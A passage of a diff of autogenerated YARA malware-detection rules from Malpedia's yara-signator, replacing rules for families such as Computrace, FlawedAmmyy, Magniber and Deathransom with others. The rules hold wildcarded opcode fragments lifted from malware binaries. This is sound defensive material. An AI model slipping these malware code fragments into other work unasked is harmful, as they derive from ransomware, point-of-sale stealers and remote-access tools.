8a5c1029 } - $sequence_7 = { 8b6c240c 56 57 55 8bf9 e8???????? 8b37 } - $sequence_8 = { 64a300000000 8965f0 8b7508 8b7d0c 8975ec c745fc00000000 0f1f440000 } - $sequence_9 = { 8bc3 2bc2 894714 8b7508 8bce e8???????? 84c0 } + $sequence_0 = { 53 50 c6450805 e8???????? be1c810000 8d4508 56 } + $sequence_1 = { 7509 0fb68340f62a00 eb02 8bc3 5b c9 c3 } + $sequence_2 = { 8985f07fffff 6a00 0f94c0 83c023 8885ec7fffff 8d85e0f7feff } + $sequence_3 = { 7417 8bf9 c1ff05 83e11f 8b3cbd20f52a00 } + $sequence_4 = { 57 e8???????? 8d4604 6a19 } + $sequence_5 = { 6a00 50 e8???????? 8b4510 83c40c 8985147cffff } + $sequence_6 = { 6802800000 8d8520010000 53 50 e8???????? 8b4510 83c418 } + $sequence_7 = { 6800400000 50 ff75fc ff15???????? 8b8514010000 2b75f4 } + $sequence_8 = { b820080100 e8???????? 53 56 ff7518 6a00 6a01 } + $sequence_9 = { e8???????? 834dfcff 8d4dec e8???????? e9???????? bf18800000 } condition: - 7 of them and filesize <1091584 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Computrace_Auto : FILE +rule MALPEDIA_Win_Ghost_Secret_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4429b6f7-4609-5864-be9b-bd86b296052a" + id = "1b3488d9-dad5-57ab-8ddb-ae7fa19ffb25" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.computrace_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghost_secret_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "d8751f69a58562c91660e3060ff3b6e112f846c07b191aab11a4034542037b61" + logic_hash = "36f12490c5a1c42890949e26bd5a0482d94d3f78b5528e6a3d7d1ab5deca281b" score = 75 quality = 75 tags = "FILE" @@ -136422,32 +139190,32 @@ rule MALPEDIA_Win_Computrace_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff75cc e8???????? 3975e4 753a } - $sequence_1 = { e8???????? 8a4002 8b0d???????? 8801 ff35???????? } - $sequence_2 = { 740e 837de400 7408 037de4 897dd8 eba6 8b4514 } - $sequence_3 = { 7503 800e08 e8???????? 894604 ff750c 8f4618 } - $sequence_4 = { e30d 83c00a 51 ff750c 50 e8???????? } - $sequence_5 = { e8???????? 837de400 0f8593feffff 8b86481b0000 83786c00 0f8483feffff } - $sequence_6 = { 8b7508 80665cfe 33c0 8945fc 8845fb 6689461a 48 } - $sequence_7 = { 7414 c745dc01000000 897d8c 6af1 } - $sequence_8 = { e8???????? 8945e4 3bc6 7417 } - $sequence_9 = { ff15???????? f7d8 1bc0 40 57 } + $sequence_0 = { 8d852cf1ffff 50 e8???????? 8d8548fbffff 50 e8???????? 59 } + $sequence_1 = { c68424af050000fd c68424b0050000f6 c68424b105000093 c68424b205000038 c68424b305000032 c68424b405000048 c68424b5050000e5 } + $sequence_2 = { c68424b902000066 c68424ba02000072 c68424bb0200001a c68424bc0200004a } + $sequence_3 = { c68424e903000052 c68424ea03000082 c68424eb03000058 c68424ec0300008e } + $sequence_4 = { c684243e030000f0 c684243f030000f2 c68424400300003b c6842441030000c7 c6842454050000ab c684245505000087 c6842456050000d6 } + $sequence_5 = { 85c0 740b 33c0 5f 5e 5b 8be5 } + $sequence_6 = { ff15???????? e9???????? a1???????? 33db 3bc7 7e0e 50 } + $sequence_7 = { c684247c05000006 c684247d0500003e c684247e05000012 c684247f05000053 c684248005000092 c684248105000042 c6842482050000e8 } + $sequence_8 = { c644247460 c64424751f c6442476e7 c64424778a c6442478dd c68424f40000006a 888c24f5000000 } + $sequence_9 = { 83c408 5f 5e 81c400200000 c3 81ecfc000000 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Ahtapot_Auto : FILE +rule MALPEDIA_Win_Mewsei_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b3228dcd-5cf8-5afe-a611-92ad75d7ce7a" + id = "78bf6ca7-ef3d-53c3-89fb-bc5bc524aac5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ahtapot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ahtapot_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mewsei_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "69c00171f493e14b569002ab8197f5ff4c272ce4e4b6b3103d5b52b14a5be8a4" + logic_hash = "3736165e5248449b2b75237b3807b31270781b320dfabe4092f7167612f74bb7" score = 75 quality = 75 tags = "FILE" @@ -136461,32 +139229,32 @@ rule MALPEDIA_Win_Ahtapot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 80e17f 3008 8b06 8bc8 c1f905 8b0c8dc0f24200 83e01f } - $sequence_1 = { c686c312000001 e9???????? 6a00 6a00 56 68???????? 6a00 } - $sequence_2 = { 740b 8d85f0fdffff e8???????? 56 8d95f0fdffff 68???????? 52 } - $sequence_3 = { 8d95f0fdffff 52 ff15???????? 83f8ff 0f8585000000 8d837c060000 50 } - $sequence_4 = { 8d8e6c020000 51 8d95acf1ffff 68???????? } - $sequence_5 = { 8d3c85c0f24200 8bf3 83e61f c1e606 8b07 0fbe440604 83e001 } - $sequence_6 = { 8b958cf3ffff 8b8578f3ffff 8d8da8f3ffff 51 52 68???????? } - $sequence_7 = { 8b5df0 8bf0 8b45ec 8d140b 52 50 56 } - $sequence_8 = { 83c404 8b1d???????? 8d95bcf9ffff 52 ffd3 8b859cf1ffff } - $sequence_9 = { e8???????? 68???????? 8d55ec 52 8975f8 897dfc c745ec20a04200 } + $sequence_0 = { 337df8 8b5dfc 237df4 337df0 037dc0 8dbc1faf0f7cf5 } + $sequence_1 = { e8???????? 50 8bc7 e8???????? 83c404 e8???????? 50 } + $sequence_2 = { 0fbe7c0602 57 e8???????? 83c404 85c0 7405 8d47d0 } + $sequence_3 = { 8b4610 8b0cb8 8911 8b55f8 } + $sequence_4 = { 57 e8???????? 8b1d???????? 83c410 6a00 } + $sequence_5 = { 83c404 895df8 85db 750c 6a01 e8???????? 83c404 } + $sequence_6 = { 6a01 6a0e 56 ff15???????? } + $sequence_7 = { 6a04 8d4df8 51 6a04 6a00 56 } + $sequence_8 = { ff15???????? 57 8bf0 53 56 ff15???????? 50 } + $sequence_9 = { 337df4 337dfc 037dcc 8dbc1ff87ca21f 8b5df0 c1c710 } condition: - 7 of them and filesize <430080 + 7 of them and filesize <504832 } -rule MALPEDIA_Win_Waterminer_Auto : FILE +rule MALPEDIA_Win_Ice_Ix_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a6c61a63-af94-546a-ae52-fcf958232615" + id = "f7014fa0-a713-5faf-ab08-c5718709e2e0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.waterminer_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ice_ix_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "3dbc2a8def87fd5744e5b18617b0d65739b7ff2d0b5a69125fd601baee65e3fe" + logic_hash = "fab5667b12ec8f3fc934ce2ccdb85e5f1acf73115ae434c2a20cd983e8b43fbd" score = 75 quality = 75 tags = "FILE" @@ -136500,40 +139268,34 @@ rule MALPEDIA_Win_Waterminer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b8514f3ffff e9???????? 83bda4f5ffff00 0f8532010000 8b8db8f5ffff c1e104 83bc0dbcf9ffff00 } - $sequence_1 = { 03442410 4403e8 428b4405e7 418bd5 } - $sequence_2 = { 03bc24a8000000 488bcd 4c8d0d35cb0300 83e13f } - $sequence_3 = { 51 b804000000 6bc019 8b8880434b00 330d???????? 894dfc 740d } - $sequence_4 = { 8b8da4fbffff 83e901 898da4fbffff 83bd10fbffff00 } - $sequence_5 = { 8bcd 50 8d15b0854300 e8???????? } - $sequence_6 = { 03c0 2bc8 0f84ec040000 8d41ff 8b848288d20600 } - $sequence_7 = { 0344240c 4403d0 488d051a560500 418b0400 } - $sequence_8 = { 03c1 03d0 488d051e580500 418b0400 } - $sequence_9 = { 83bd60ffffff0b 0f8711060000 8b8d60ffffff ff248d74304800 0fbe55d3 } - $sequence_10 = { 02c8 41880c18 418a03 240f } - $sequence_11 = { 0344240c 4403d0 428b4405e7 418bd2 } - $sequence_12 = { 02d0 49ffc3 418d4001 881418 } - $sequence_13 = { c78538fbffff01000000 eb0a c78538fbffff00000000 8b8538fbffff 898530fbffff } - $sequence_14 = { 8b95c4fbffff 8995f0fbffff 8b85ecfbffff 055d010000 898580fbffff } - $sequence_15 = { 33c5 8945fc 8bf4 6a00 8bfc ff15???????? 3bfc } + $sequence_0 = { 3bc3 748c 6a01 8d4584 50 6883346425 e8???????? } + $sequence_1 = { 85db 0f844b020000 81fe00020000 0f873f020000 83fe06 0f86e5000000 8b03 } + $sequence_2 = { 50 e8???????? 50 53 8d857cfeffff 50 e8???????? } + $sequence_3 = { 56 57 6a02 5b 53 6821634578 } + $sequence_4 = { 8d75b8 b891000000 e8???????? 8d75d0 b892000000 e8???????? 8d75dc } + $sequence_5 = { 0f84dc000000 8d442420 50 ff15???????? 8db424c0000000 b8a2000000 e8???????? } + $sequence_6 = { 6a73 8d74243c 58 e8???????? 8bc6 89442410 } + $sequence_7 = { 6a42 8db550ffffff 58 e8???????? 8b75f4 8b55f0 3bf7 } + $sequence_8 = { 0f84a7000000 83f8ff 0f849e000000 6a3b 8d75e0 58 897dec } + $sequence_9 = { 68cc000000 6a2d 58 e8???????? ff75d0 ff15???????? 5f } condition: - 7 of them and filesize <1556480 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Rm3_Auto : FILE +rule MALPEDIA_Win_Flawedammyy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7719069f-32fe-5972-8438-aed4e36844e7" + id = "3bd73c1c-99e8-572f-ab1b-fa9278709331" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rm3_auto.yar#L1-L378" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flawedammyy_auto.yar#L1-L298" license_url = "N/A" - logic_hash = "108e288ac75d378107658478aa6294381528e48e962e4f140c133bb5541af046" + logic_hash = "4dc76e66643bc2a94f8c1ec04c44669739ca4e00a00102a02a05781e927a5ab3" score = 75 - quality = 73 + quality = 33 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -136545,62 +139307,54 @@ rule MALPEDIA_Win_Rm3_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d7c13ff 4a f7d2 23fa 3bf8 7609 } - $sequence_1 = { 8b4138 8b5608 8d5410ff 48 f7d0 } - $sequence_2 = { 8b45f8 83c628 ff4dfc 85c0 } - $sequence_3 = { 8931 8b7004 897104 8b4808 ff7004 } - $sequence_4 = { 034c240c 8b00 51 03c2 50 e8???????? } - $sequence_5 = { 3bf8 7609 8b413c 8d5418ff eb0a } - $sequence_6 = { 8b460c 03c2 394508 7303 8975f8 8b45f8 } - $sequence_7 = { 8b5e10 8d4438ff 4f f7d7 23c7 8d7c13ff 4a } - $sequence_8 = { 41 ff4508 ff4d0c 885405fc } - $sequence_9 = { 57 8bc3 8d9568ffffff e8???????? 8b849d64ffffff } - $sequence_10 = { e8???????? 8b5508 57 8bc3 8d8d58feffff e8???????? } - $sequence_11 = { 8b750c 50 8db4b558feffff 894510 } - $sequence_12 = { 8bf0 2b7508 f7de 1bf6 83e60b } - $sequence_13 = { e8???????? 8bd8 85db 7420 8d45fc } - $sequence_14 = { e8???????? 2bf3 89750c 0f88b3000000 8d3c1e 8dbcbd58feffff } - $sequence_15 = { 744b 8975fc 6a18 5e } - $sequence_16 = { 33d2 4533c0 410fc9 48f7b42488000000 8b15???????? } - $sequence_17 = { 488bf3 488bce e8???????? 4885c0 488bd8 7415 } - $sequence_18 = { 4155 4156 4157 4883ec30 4c8b05???????? 49b91ddd6c4f91f44525 } - $sequence_19 = { 41be18000000 488b15???????? 488b4270 488bc8 48c1e90c 4833c1 488bc8 } - $sequence_20 = { 57 4154 4155 4156 4157 4883ec20 4c8b05???????? } - $sequence_21 = { 488bc1 48c1e81b 4833c1 33c9 480fafc3 } - $sequence_22 = { ff15???????? 85c0 7445 488d4c2468 ff15???????? ff15???????? } - $sequence_23 = { 488d4c2440 4c8bce 4c8bc5 498bd4 } - $sequence_24 = { 899568ffffff 89b564ffffff 889d63ffffff 7570 31c0 89855cffffff eb16 } - $sequence_25 = { 8d0d84308702 31d2 8b75f0 89462c 890c24 } - $sequence_26 = { 885801 39d7 897db8 8975b4 75d7 8d45d4 } - $sequence_27 = { a1???????? 6a00 6a00 6a00 6a00 68???????? ffd0 } - $sequence_28 = { ffd0 8d0dd1318702 890424 894c2404 e8???????? 83f800 } - $sequence_29 = { 52 8bb5e0fbffff 56 8985d0fbffff 8995ccfbffff 898dc8fbffff ffd7 } - $sequence_30 = { 8945d0 8b45d0 8b4dd4 8b55ec 01ca 891424 } - $sequence_31 = { 897dec 8955e8 8975e4 ffd3 83ec10 890424 } - $sequence_32 = { 53 57 56 83ec20 8b450c 8b4d08 31d2 } - $sequence_33 = { 890c24 c744240400000000 8955dc e8???????? 8d0d77318702 890424 } - $sequence_34 = { 8b7834 8b5f3c 8945f0 89f8 01d8 813c1f50450000 } - $sequence_35 = { 8bbd64fdffff 897e08 8b9d68fdffff 891e } - $sequence_36 = { c7460cfe308702 c74604???????? 8b35???????? 8985e0fdffff 898ddcfdffff 8995d8fdffff } - $sequence_37 = { 898dfcfeffff e8???????? 890424 8b853cffffff 89442404 } - $sequence_38 = { 89e2 894a04 c70204010000 8b15???????? 8985e8fdffff 898de4fdffff } - $sequence_39 = { 8b5924 89855cffffff 89d8 c1e81e 83e001 } + $sequence_0 = { 0000 0404 0404 0404 0401 } + $sequence_1 = { 8bc4 83ec10 660fd600 f30f7e45ac } + $sequence_2 = { 00b3854200e5 854200 37 864200 } + $sequence_3 = { 8d85bcfcffff 68???????? 50 ffd3 68dff0f081 6a01 e8???????? } + $sequence_4 = { ffd6 8d8594f3ffff 50 68???????? 68???????? } + $sequence_5 = { 004bbf 42 0062bf 42 } + $sequence_6 = { 0039 e342 0048e3 42 } + $sequence_7 = { ff05???????? f7460c0c010000 7554 833cbd7cae410000 53 } + $sequence_8 = { 8d85bcfdffff 50 ffd3 8b45fc 80384d 0f85a7000000 8078015a } + $sequence_9 = { e8???????? 53 8d85c0fdffff 50 56 e8???????? } + $sequence_10 = { 0018 874200 58 874200 } + $sequence_11 = { 8b35???????? 8d85a0f6ffff 50 8d85a8f8ffff } + $sequence_12 = { 002a e342 0039 e342 } + $sequence_13 = { 8bf0 ff5208 85f6 0f8818feffff ff7508 8d4df0 e8???????? } + $sequence_14 = { 0022 8a4200 828a4200bb8a42 00ff } + $sequence_15 = { 0062bf 42 0079bf 42 } + $sequence_16 = { ff15???????? 8b75d8 e9???????? 8d85d0feffff 68???????? 50 ff15???????? } + $sequence_17 = { 8b46f8 834de4ff 49 c745e8ff000000 8b3c857c303400 c745ecffff0000 0faff9 } + $sequence_18 = { 4e 48 75f7 68???????? 57 ff15???????? } + $sequence_19 = { 8bdf 8b06 83661c00 83f807 0f87c9000000 ff248580233400 } + $sequence_20 = { 8b46f8 8b04855c303400 c1e002 50 6a40 } + $sequence_21 = { 8b4ef8 83f907 0f8781000000 ff248dfd243400 } + $sequence_22 = { 7330 ff75f8 ff15???????? 81c600040000 6a42 56 } + $sequence_23 = { eb0e 8b14957c303400 49 0fafd1 0155fc } + $sequence_24 = { 83f937 7f2a 8d44c1d0 0fbe0a } + $sequence_25 = { 33db 83f855 0f872affffff 0fb6805a213400 ff2485f6203400 8b8614080000 } + $sequence_26 = { 56 8a0a 80f930 7569 } + $sequence_27 = { 395d08 88987830ca01 0f8484010000 ff75fc 8b35???????? ffd6 f6450802 } + $sequence_28 = { 50 e8???????? ff75ac 8b3d???????? ffd7 ff75a8 ffd7 } + $sequence_29 = { ff248580233400 832700 e9???????? 55 e8???????? eb1a } + $sequence_30 = { 895df0 ffd6 53 ff75dc 6813100000 ff35???????? } + $sequence_31 = { 0f8781000000 ff248dfd243400 881f eb76 } condition: - 7 of them and filesize <221184 + 7 of them and filesize <1350656 } -rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE +rule MALPEDIA_Win_Orchard_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a0867608-6152-525b-bb1e-ffd07d70fa86" + id = "68833672-b2e1-5b37-9ae2-2dac96bba231" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.multigrain_pos_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orchard_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "e5b2ff30a169eba30bec1ec0cb7a796ca39923255067b4e9a8563c5dcf8b4ca3" + logic_hash = "70c3ab090316ecb85f40208f530bb1fb9e1727e271d34e7cabe8cdcf998bd59f" score = 75 quality = 75 tags = "FILE" @@ -136614,32 +139368,38 @@ rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745fc00000000 8b7518 b8cdcccccc 8d0cf504000000 } - $sequence_1 = { 57 e8???????? 83c404 6a00 c746140f000000 } - $sequence_2 = { c645fc01 e8???????? 83c408 83bdb4fdffff08 720e ffb5a0fdffff } - $sequence_3 = { 0f8530020000 68c8000000 50 8d85c4feffff 50 e8???????? 83c40c } - $sequence_4 = { 0fb64c1e01 c1e905 894df4 eb07 c745f400000000 0fb60c1e 8b55f8 } - $sequence_5 = { 8bd0 8d4dd8 c645fc03 e8???????? } - $sequence_6 = { c745e0ffffffff c745e800000000 c745e400000000 c745ec01000000 c745f401000000 } - $sequence_7 = { e8???????? 83c404 56 ffd3 33db 395f10 56 } - $sequence_8 = { 81eca8040000 a1???????? 33c4 898424a4040000 56 57 } - $sequence_9 = { c745f400000000 8b4df0 8b5df8 0fb609 83e101 } + $sequence_0 = { 83c404 e8???????? 99 b95b000000 f7f9 } + $sequence_1 = { 6a01 c645fc08 e8???????? 894604 83c404 8d4718 897034 } + $sequence_2 = { 56 ff15???????? ff15???????? 50 6a00 } + $sequence_3 = { 8b8550fdffff 83e001 0f8412000000 83a550fdfffffe } + $sequence_4 = { 8a45ef 884740 7510 8b470c 8bcf 6a00 } + $sequence_5 = { 8d442410 50 ff15???????? 6685c0 } + $sequence_6 = { 8b5de8 894348 8b5de0 c70600000000 } + $sequence_7 = { 8b75a8 46 56 e8???????? } + $sequence_8 = { 8b54240c 83d200 03c1 8b4c2420 } + $sequence_9 = { f7f9 81c2d0070000 52 ffd6 } + $sequence_10 = { 8b10 8bc8 6a01 ff12 837f3800 8a45ef } + $sequence_11 = { 8b07 6a08 895de0 8b4004 } + $sequence_12 = { 83f81f 0f877e030000 52 51 e8???????? } + $sequence_13 = { 8b7c2424 89542428 8b54240c 83d200 } + $sequence_14 = { 50 ff15???????? 83f805 7507 } + $sequence_15 = { 8bc8 83e01f c1f905 8b0c8d00755d00 c1e006 8d44010c 50 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <4716352 } -rule MALPEDIA_Win_Pickpocket_Auto : FILE +rule MALPEDIA_Win_Magniber_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9a488247-9e86-5930-98a0-6918c231e819" + id = "05f5671a-f33b-5211-a81c-43695f05ea5d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pickpocket_auto.yar#L1-L111" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.magniber_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "d7990d44202646b62032b82a90fb7e07e373731a34449c62076ef24e8ce04d57" + logic_hash = "a03ae86175c535bb9d3d882302b08d3c7bb8579783b2000a5224d25eaa155af3" score = 75 quality = 75 tags = "FILE" @@ -136653,32 +139413,37 @@ rule MALPEDIA_Win_Pickpocket_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 750f b962890100 e8???????? } - $sequence_1 = { 7e1e b9dccc0000 e9???????? b9cecc0000 e9???????? b9c7cc0000 } - $sequence_2 = { 7404 8b01 eb03 83c8ff 83f804 } - $sequence_3 = { d3e0 a846 750f b99be00100 e8???????? e9???????? } - $sequence_4 = { e8???????? 85c0 750e b958de0100 } - $sequence_5 = { 85c0 750e b958de0100 e8???????? 8bc8 } - $sequence_6 = { 85c0 740f b989000100 e8???????? } - $sequence_7 = { 7e16 b91bcc0000 eb05 b916cc0000 } - $sequence_8 = { eb0c b96ccb0000 eb05 b960cb0000 } - $sequence_9 = { eb09 8bc7 eb0a b9a9d60000 e8???????? } + $sequence_0 = { 50 e8???????? 83c408 837dfc00 7502 eb31 6a00 } + $sequence_1 = { 8b45e8 50 ff15???????? 8b4df4 51 } + $sequence_2 = { c785a0fafffff0934000 c785a4fafffff8934000 c785a8faffff00944000 c785acfaffff08944000 } + $sequence_3 = { 50 8b4df4 51 ff15???????? 8b45f8 99 } + $sequence_4 = { 83c408 8b4dfc 8b55f8 6689044a } + $sequence_5 = { c7852cfbffff14954000 c78530fbffff1c954000 c78534fbffff24954000 c78538fbffff2c954000 c7853cfbffff34954000 c78540fbffff40954000 } + $sequence_6 = { 66894da4 ba2f000000 668955a6 b853000000 668945a8 b943000000 } + $sequence_7 = { 0f842e010000 660f57c0 660f1345b0 6a00 8d4df8 51 6a10 } + $sequence_8 = { f76e9f 32d8 2d7a350e78 95 } + $sequence_9 = { 4834b0 184026 e221 a1????????05eef081 e0f8 29aed0515fa6 8d4f0e } + $sequence_10 = { 56 18cb 52 fc 285f44 c1c70d 11fb } + $sequence_11 = { e8???????? 32cb 5a b3b1 } + $sequence_12 = { 4e4e54 70ac 52 f8 a6 6e } + $sequence_13 = { 29aed0515fa6 8d4f0e 7f4c c82cd1c6 1a32 b636 } + $sequence_14 = { 5a b3b1 3e6c 21746c2e 4834b0 184026 } condition: - 7 of them and filesize <1458176 + 7 of them and filesize <117760 } -rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE +rule MALPEDIA_Win_Rtpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d42c3028-47d8-5c2a-8245-ee48597fdb68" + id = "77dcd653-95cb-55c4-91a1-f9b9e9596fd3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.apocalypse_ransom_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rtpos_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "3006a8aede4427b243aedfb686311f3de66b1be38f627de23e7cfc996b17033d" + logic_hash = "4ad89a49b88ba1ea262b015470065dd4f3f20d950975a1f27ea85a4b99624bd0" score = 75 quality = 75 tags = "FILE" @@ -136692,32 +139457,32 @@ rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 68???????? 8d84240c040000 50 ff15???????? 85c0 742f } - $sequence_1 = { 83f8ff 755f 6a01 8d44240c 50 8d8c2410040000 } - $sequence_2 = { 0bfb ff15???????? 33d2 83f802 } - $sequence_3 = { 8d4c2410 68???????? 51 ff15???????? 83c410 6a00 6a00 } - $sequence_4 = { ffd6 b801000000 5e 83c418 c3 33c0 } - $sequence_5 = { 68???????? 6a00 ffd7 8bf0 85f6 7504 5f } - $sequence_6 = { 83f8ff 7411 50 ff15???????? 8d0424 50 ff15???????? } - $sequence_7 = { 83c40c 57 53 ff15???????? 6800800000 } - $sequence_8 = { ffd7 85c0 7440 8b1d???????? 8b2d???????? 8b542410 8d4c2410 } - $sequence_9 = { 6a03 6800000040 52 ffd6 } + $sequence_0 = { 68a8040000 8b45ec 50 e8???????? 83c408 c3 8b542408 } + $sequence_1 = { 83e908 8d7608 660fd60f 8d7f08 8b048d74b44000 } + $sequence_2 = { 8b0cc5c4ae4200 894de4 85c9 7455 } + $sequence_3 = { 7619 8b4dd4 51 ff15???????? } + $sequence_4 = { 8d45d8 50 6a00 8b4dd4 51 } + $sequence_5 = { 85c0 752c 6a00 68???????? 68???????? 6a02 68???????? } + $sequence_6 = { 8bec 53 8b5d08 33c9 57 33c0 8d3c9d5c654300 } + $sequence_7 = { 33c5 8945fc c745d800000000 c745dc00000000 33c0 } + $sequence_8 = { 2b45c4 3b45f0 7619 8b4dd4 51 ff15???????? } + $sequence_9 = { 6bc030 03048db86a4300 50 ff15???????? 5d c3 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <507904 } -rule MALPEDIA_Win_Deathransom_Auto : FILE +rule MALPEDIA_Win_Plurox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4e39de37-0fee-5b21-a4db-fc348269215e" + id = "6592f7da-a1c0-54df-8b9b-d6d4f0de3577" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deathransom_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plurox_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "8362ae87c1f20555b6e75c6240bf76604d10b1d1a7af4c90e341b81be4a45543" + logic_hash = "2767330918862f71924876620bde24f2504b741e0c74e8fbd24789f747d1fbb9" score = 75 quality = 75 tags = "FILE" @@ -136731,32 +139496,32 @@ rule MALPEDIA_Win_Deathransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b55d8 33c3 03c1 81c216c1a419 03d0 8bcf 0155ec } - $sequence_1 = { 03d1 c1c007 0355a8 8bcf c1c90b 33c8 8955d8 } - $sequence_2 = { 742d 8b45f8 ba20000000 2bd6 8bca d3e8 8bce } - $sequence_3 = { 0f8278010000 8b5df4 8d4dd8 56 8bd3 837b0400 } - $sequence_4 = { c3 83f802 7546 6820020000 6a08 c745fc20020000 ff15???????? } - $sequence_5 = { 8d8d90fdffff e8???????? 8d8d90fdffff e8???????? 8d8d90fdffff e8???????? 6a50 } - $sequence_6 = { 0b7de4 237ddc 8b55f4 0bf8 897de0 8bc6 014de0 } - $sequence_7 = { 8b45dc 8bc8 0155e8 c1c00a } - $sequence_8 = { 85c9 0f95c0 2bc8 33c0 c1e905 } - $sequence_9 = { c1e810 884311 8bc1 c1e808 884312 884b13 8b4f1c } + $sequence_0 = { 90 f9 0925???????? 0000 } + $sequence_1 = { 1a6e00 0000 94 624a8b 0416 } + $sequence_2 = { 6f b804000000 4e 4f b84e4f3dd9 } + $sequence_3 = { 94 f8 21480e 2a15???????? 6f b804000000 } + $sequence_4 = { e9???????? e408 6873d30808 94 e519 e8???????? 0000 } + $sequence_5 = { 8918 43 0416 0a20 0816 ec bbf2000000 } + $sequence_6 = { 8a00 46 0c83 47 } + $sequence_7 = { 624a8b 0416 128bc606091a f6870f1a000000 e10d } + $sequence_8 = { 07 f3cf 6b0000 0025???????? 7171 6805245f07 40 } + $sequence_9 = { 64841a 6c 2432 3449 